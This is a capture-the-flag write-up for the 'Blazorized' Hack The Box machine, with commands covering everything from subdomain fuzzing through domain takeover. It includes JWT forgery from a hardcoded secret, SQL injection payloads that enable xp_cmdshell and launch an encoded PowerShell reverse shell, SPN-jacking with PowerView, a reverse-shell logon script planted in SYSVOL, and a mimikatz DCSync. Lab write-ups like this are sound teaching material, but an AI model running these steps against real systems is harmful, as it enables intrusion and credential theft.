0x1 Initial Access
- Web application on port 80 is built with the Blazor WebAssembly
- Subdomain Enumeration
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://blazorized.htb" -H "HOST: FUZZ.blazorized.htb" -c -fs 144
- Found subdomains
and admin.blazorized.htb
requires credentials to login
- For better understanding blazor web apps and structure please refer to official documentation on GITHUB
- Found endpoints:
: Essential for running Blazor apps
: Contains WebAssembly binaries
- Deobfuscating
reveals the path _framework/blazor.boot.json
which contains metadata about the application such as DLLs
- Check for customised DLLs:
"Blazored.LocalStorage.dll": "sha256-5V8ovY1srbIIz7lzzMhLd3nNJ9LJ6bHoBOnLJahv8Go=",
"Blazorized.DigitalGarden.dll": "sha256-YH2BGBuuUllYRVTLRSM+TxZtmhmNitErmBqq1Xb1fdI=",
"Blazorized.Shared.dll": "sha256-Bz\/iaIKjbUZ4pzYB1LxrExKonhSlVdPH63LsehtJDqY=",
"Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
0x2 DLL Ananlysis
- Decompile DLLs using DNSpy
- Hardcoded secret in
private static readonly string jwtSymmetricSecurityKey = "869............d0a";
private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
private static readonly string superAdminRoleClaimValue = "Super_Admin";
private static readonly string issuer = "http://api.blazorized.htb";
private static readonly string apiAudience = "http://api.blazorized.htb";
private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";
- Forge a JWT for Super Admin on JWT.IO
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Super_Admin",
"iss": "http://api.blazorized.htb",
"aud": "http://admin.blazorized.htb",
"exp": <expiration_timestamp>
- Set the jwt token to Local Storage → admin → jwt:
- Refresh
to get access to admin dashboard
0x3 Admin Dashboard
- Sql Injection on dashboard
- Enable xp_cmdshell from Check duplicate posts
www'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
www'; exec master..xp_cmdshell 'xxx';-- -
www'; exec master..xp_cmdshell 'powershell -enc powershell#base64 from revshells.com';-- -
0x4 NU_1055
- BloodHound reveals that
has writeSPN
Privilege on the RSA_4801
- Vulnerable to SPN-jacking
- Import PowerView
- Set SPN
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='kitty/kat'}
Get-DomainSPNTicket -SPN kitty/kat
- Save the hash
- Crack the hash using hashcat
- Login to RSA_4810 using evil-winrm
0x5 RSA_4810
- From Bloodhound we can see that
is member of group Remote_Support_Administrators
- Run winpeas, we have writeable file path
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
- We have write privilege under
directory in SYSVOL
which is commonly used for logon scripts and Group Policy Data
- User
login every minute
also runs a logon script from scriptpath
, indicating that logon scripts are stored in NETLOGON Share
- Using icacls, it was verified that RSA_4810 has write access to the batch files
- Create a logon script for
to get a reverse shell
'powershell -e bas64 encoded payload'| Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII
- Set the ScriptPath for SSA_6010
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\shell.bat'
0x6 SSA_6010
- Run Bloodhound again and we can see that
is member of Super_Support_Administrators
- DCSync Privilege allows us to extract credentials
- Load mimikatz
lsadump::dcsync /domain:blazorized.htb /user:Administrator
0x7 Administrator
- Login as Administrator using evil-winrm with extracted NTLM Hash